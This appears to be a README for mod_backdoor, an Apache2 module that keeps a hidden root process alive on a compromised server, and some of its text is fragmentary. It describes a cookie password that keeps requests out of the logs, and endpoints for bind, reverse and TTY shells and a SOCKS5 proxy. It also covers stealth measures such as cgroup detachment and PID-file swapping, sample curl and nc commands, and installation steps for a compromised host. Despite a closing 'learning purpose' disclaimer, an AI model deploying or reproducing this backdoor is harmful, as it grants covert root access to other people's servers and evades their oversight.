A backdoor module for Apache2
No Data
mod_backdoor is a stealth backdoor using an Apache2 module.
The main idea is to fork() the primary Apache2 process just after it has loaded its config.
Since it's forked before the root user transfers the process to www-data, you can execute command as root.
As Apache2 loads its configuration only when you (re)start it, the challenge was to never let die this
forked root apache2 process, to let us interact as root with the compromised system.
The password is send through Cookie headers:
Cookie: password=backdoor. It's defined with
#definein the beginning of mod_backdoor.c, so you could easily edit it.
Each following requests must contain this password to interact with the module.
Each request containing this cookie will not be logged by Apache if the module is running.
Each shell spawns attached to PID 1 and is removed from apache2 cgroup.
It means it's possible to restart/stop apache2.service from a spawned shell (not true for
TTY shells because an apache2 process is needed to do the bidirectional communication between socket
and pty). It also improves stealth, shells are no longer related to apache2.service.
On non-systemd systems, it should work aswell. The main differences are, with systemd, the IPC socket is stored in a private
/tmp/. This private
/tmpis automatically cleaned up when apache2 . Systemd automatically kills all instance of apache2 when you ask for a .
/tmpfor the application, so the IPC socket is created in the public
/tmp.
/var/run/apache2/apache2.pidwith the PID of our forked root apache2 process and save the original one.
SIGTERM / SIGKILLin order to : * Remove IPC socket * Remove cgroup2 folder * Put original PID in
/var/run/apache2/apache2.pid* Call
apachectl stopto simulate the original behavior of the init script. * Exit our forked root apache2 process
The path
/var/run/apache2/apache2.pidis stored in the environment variable:
APACHE_PID_FILE
If you have a better idea for init-like system, feel free to contact me (or PR) !
The apache2 server needs to be compiled with the mod_so to allow Dynamic Shared Object (DSO) support.
The endpoint
http[s]:///bind/binds a listening port on
:
forkpty()is used to obtain a native TTY shell, working with an IPC UNIX socket to communicate between forked TTY process and the new socket you just opened.
CTRL-Z --> stty raw -echo --> fg --> reset
It works like the bind shell, the endpoint
http[s]:///revtty//returns a TTY shell to
:
The endpoint
http[s]:///reverse///returns a shell to
:.
| Native | External |
| :------: | :--------:|
| sh | php |
| bash | python |
| dash | ruby |
| ash | perl |
| tcsh | |
| ksh | |
execfunction.
/bin/sh.
Source code comes from https://github.com/rofl0r/microsocks
The endpoint
http[s]:///proxy//opens a socks5 proxy on . is optional. If you set it, it activates the auth mode. Password is the same as the mod_backdoor.
user:pass, it is added to a whitelist and may use the proxy without auth. This is handy for programs like firefox that don't support
user:passauth.
curl -H 'Cookie: password=backdoor' http:///proxy/1337/vlad
vladuser 2.
curl -x socks5://vlad:[email protected]:1337 https://www.google.com
imdonewithyouin a socket
echo "imdonewithyou" | nc 1337
The endpoint
http[s]:///pingtells you if the module is currently working.
Apache2 Module Backdoor is inspired from Ringbuilder, created by Juan Manuel Fernandez (@TheXC3LL)
More info about Ringbuilder:
https://github.com/TarlogicSecurity/mod_ringbuilder
https://www.tarlogic.com/en/blog/backdoors-modulos-apache/
Socks5 code was adapted from https://github.com/rofl0r/microsocks
Special thanks to @Ug_0Security
For development :
*
apxs -i -a -c mod_backdoor.c sblist.c sblist_delete.c server.c -Wl,-lutil
-Wl,-lutilused to link mod_backdoor.so with libutil.so to use forkpty() from *
systemctl restart apache2
On a compromised server :
* Compile it for the desired arch and retrieve the modbackdoor.so or
get it from the
build/folder (compiled for: Apache/2.4.41 (Debian)). * Copy modbackdoor.so to
/usr/lib/apache2/modules/mod_backdoor.so* Copy backdoor.load to
/etc/apache2/mod-available/backdoor.load*
a2enmod backdoor-->
systemctl restart apache2
Vlad Rico (@RicoVlad)
This project was created only for learning purpose.
Usage of mod_backdoor for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.